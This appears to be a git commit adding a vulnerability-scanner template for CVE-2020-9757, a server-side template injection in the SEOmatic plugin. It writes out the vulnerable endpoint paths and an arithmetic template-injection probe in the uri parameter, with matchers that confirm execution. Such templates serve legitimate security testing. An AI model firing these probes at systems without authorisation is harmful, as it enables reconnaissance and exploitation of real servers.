🔥 Add SEOmatic SSTI (CVE-2020-9757)
parent
53a9952dc7
commit
fc3bc06f65
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-9757
|
||||
|
||||
info:
|
||||
name: SEOmatic < 3.3.0 Server-Side Template Injection
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{31330+'7'}}"
|
||||
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{31330+'7'}}"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "MetaLinkContainer"
|
||||
- "canonical"
|
||||
- "31337"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue